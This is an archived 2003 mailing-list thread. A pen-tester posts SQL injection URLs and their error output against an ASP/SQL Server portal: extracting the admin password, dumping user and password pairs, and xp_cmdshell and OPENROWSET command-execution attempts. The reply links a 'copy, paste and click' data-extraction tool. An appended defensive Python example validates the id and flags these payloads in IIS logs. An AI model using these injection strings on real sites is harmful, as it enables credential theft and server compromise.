Re: SQL Injection ASP + SQL Server (problem) ?!

From: Cesar (cesarc56@yahoo.com)
Date: Wed Jul 30 2003 - 11:53:47 EDT


Hi.

Take a look at this paper:
http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

Also this tool; you only have to copy, paste and click,
and you get all the data you want:
http://www.appsecinc.com/resources/freetools/DataThief.zip

Cesar.

--- sekure@hadrion.com.br wrote:
> Hi,
>
> I'm doing a pen-test on a web server running Win2K + IIS + ASP + SQL
> Server (filtered for internet connections).
>
> The IIS appears to be very well patched. I'm trying SQL Injection. :)
>
> I found a bug in an ASP script... see:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
>
> I received the name of the min(user) in the users table, see:
>
> Technical Information (for support personnel)
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
> the nvarchar value 'admin' to a column of data type int.
>
> The username is "admin". Now I want to know the password of "admin". I
> tried:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
>
> But I received this:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more
> than 1 value. This is not permitted when the subquery follows =, !=,
> <, <= , >, >= or when the subquery is used as an expression.
>
> 1 - Does someone know how to make it return more than 1 value? Can you
> give me an example?
>
> I tried this too:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
>
> And I received this:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
> the varchar value
> '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}'
> to a column of data type int.
>
> 2 - But it isn't a "password", it appears to be a registry key. Does
> someone know what it is? And how to make it work and see the
> password? :)
>
> 3 - I tried to create a SQL transaction like this:
>
> http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20@ret%20varchar(8000)%20set%20@ret=':'%20select%20@ret=@ret+'%20+user+'/'+senha%20from%20users%20where%20user>@ret%20select%20@ret%20as%20ret%20into%20alluser%20end%20--
>
> I received this:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
> starts with '; begin declare @ret varchar(8000) set @ret=':' select
> @ret=@ret '  user '/' senha from users where user>@ret select @ret
> as' is too long. Maximum length is 128.
>
> Does someone know why I received this error? Did I overflow the size
> allowed in the parameter by the variable in ASP? Or in SQL Server? How
> to make it work? :)
>
> 4 - My last doubt. I tried to execute commands with xp_cmdshell... see:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--
>
> and received:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string ';EXEC master..xp_cmdshell(cmd.exe /c)--'.
>
> OR:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
> syntax near ';EXEC master.dbo.xp_cmdshell'.
>
> OR using quotes:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
> syntax near '`'.
>
> And I tried this too (use the bug to exec the xp_cmdshell stored
> procedure with a non-privileged user):
>
> http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive... again the error:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
> starts with ';(SELECT * FROM
> OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
> FMTONLY OFF execute master..xp_cmdshell' is too long. Maximum length
> is 128.
>
> If I try:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Could not create an
> instance of OLE DB provider 'SQLOLEDB'.
>
> What am I doing wrong? How to make it work?
>
> Thkz a lot.
>
> Best Regards.
>
> [ ]'s

__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
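As an added example (not code from the original thread or from either poster), here is the defender-side view of the pattern quoted above. The ODBC errors say the target column is of data type int, so id_notice should never have reached SQL Server as anything but an integer; the check below is that missing validation, and the same rule, run over a few constructed IIS W3C log lines, picks out the probes shown in the thread. The log field layout, the client addresses, and all function names are my own assumptions for this example.

```python
"""Defensive checks for the id_notice injection pattern quoted in this thread.

Added example; not code from the original post or either poster. Assumes
IIS W3C log lines with exactly these fields (constructed for this example):
date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
and that id_notice (spelled id_noticia in one request) should be an integer,
which the quoted ODBC errors confirm ("to a column of data type int").
"""
import re
from urllib.parse import unquote_plus

# Tokens that have no business in an integer id parameter. Every one of
# them appears in the requests quoted in the thread.
SUSPICIOUS_TOKENS = ("xp_cmdshell", "openrowset", "select", "--", "'", ";")

# Strict allow-list for the id: a short run of digits and nothing else.
ID_PATTERN = re.compile(r"^\d{1,9}$")

# The parameter appears under two spellings in the quoted requests.
ID_PARAMS = ("id_notice", "id_noticia")

# Constructed sample log (not real traffic); the query strings are the ones
# quoted in the thread, so the checks can be exercised offline.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-07-30 11:10:01 10.0.0.5 GET /portal/index.asp local=read&id_notice=42 200
2003-07-30 11:10:07 10.0.0.9 GET /portal/index.asp local=read&id_notice=(select%20min(user)%20from%20users)%20-- 500
2003-07-30 11:10:15 10.0.0.9 GET /portal/index.asp local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'-- 500
2003-07-30 11:10:22 10.0.0.5 GET /portal/index.asp local=read&id_notice=7 200
"""


def validate_id(raw: str):
    """Return the id as an int, or None if the value is not a plain integer.

    This is the check the vulnerable index.asp lacked: the raw value was
    concatenated into the SQL text, so anything that fails here was being
    handed to SQL Server verbatim.
    """
    return int(raw) if ID_PATTERN.match(raw) else None


def parse_query(uri_query: str) -> dict:
    """Split a raw query string into {name: [values]}, decoding %xx and '+'.

    Done by hand rather than with urllib.parse.parse_qs so that ';' is never
    treated as a pair separator (older Python versions did that), which would
    hide the ';EXEC ...' tail from the check below.
    """
    params = {}
    for pair in uri_query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def inspect_query(uri_query: str) -> list:
    """Return the reasons a query string looks like an injection attempt."""
    reasons = []
    params = parse_query(uri_query)
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if validate_id(value) is None:
                reasons.append(f"non-integer {name}: {value[:40]!r}")
            lowered = value.lower()
            for token in SUSPICIOUS_TOKENS:
                if token in lowered:
                    reasons.append(f"token {token!r} in {name}")
    return reasons


def parse_iis_line(line: str) -> dict:
    """Split one W3C log line into named fields (seven fields assumed)."""
    fields = line.split()
    if len(fields) != 7:
        raise ValueError(f"unexpected field count in {line!r}")
    date, time, c_ip, method, stem, query, status = fields
    return {"date": date, "time": time, "c_ip": c_ip, "method": method,
            "uri_stem": stem, "uri_query": query, "status": int(status)}


def scan_log(lines) -> list:
    """Return (c_ip, uri_query, reasons) for every line worth an analyst's look."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # blank or W3C directive line
        rec = parse_iis_line(line)
        reasons = inspect_query(rec["uri_query"])
        # A 500 on a request whose id failed validation is the pattern the
        # thread shows: the ODBC error text came back in the page body.
        if reasons and rec["status"] == 500:
            reasons.append("server error on rejected id (possible error disclosure)")
        if reasons:
            findings.append((rec["c_ip"], rec["uri_query"], reasons))
    return findings


if __name__ == "__main__":
    for c_ip, query, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(c_ip, query[:60])
        for r in reasons:
            print("   -", r)
```

On the ASP side the equivalent fix is to reject the value unless it parses as an integer before any SQL is built, or better, to pass it as a typed parameter through an ADODB.Command rather than concatenating it into the query text. The second half of the problem in the thread is that the raw ODBC error was returned to the browser; with detailed errors kept out of client responses, the type-conversion messages that disclosed the users table contents would have stayed in the server log.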




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:37 EDT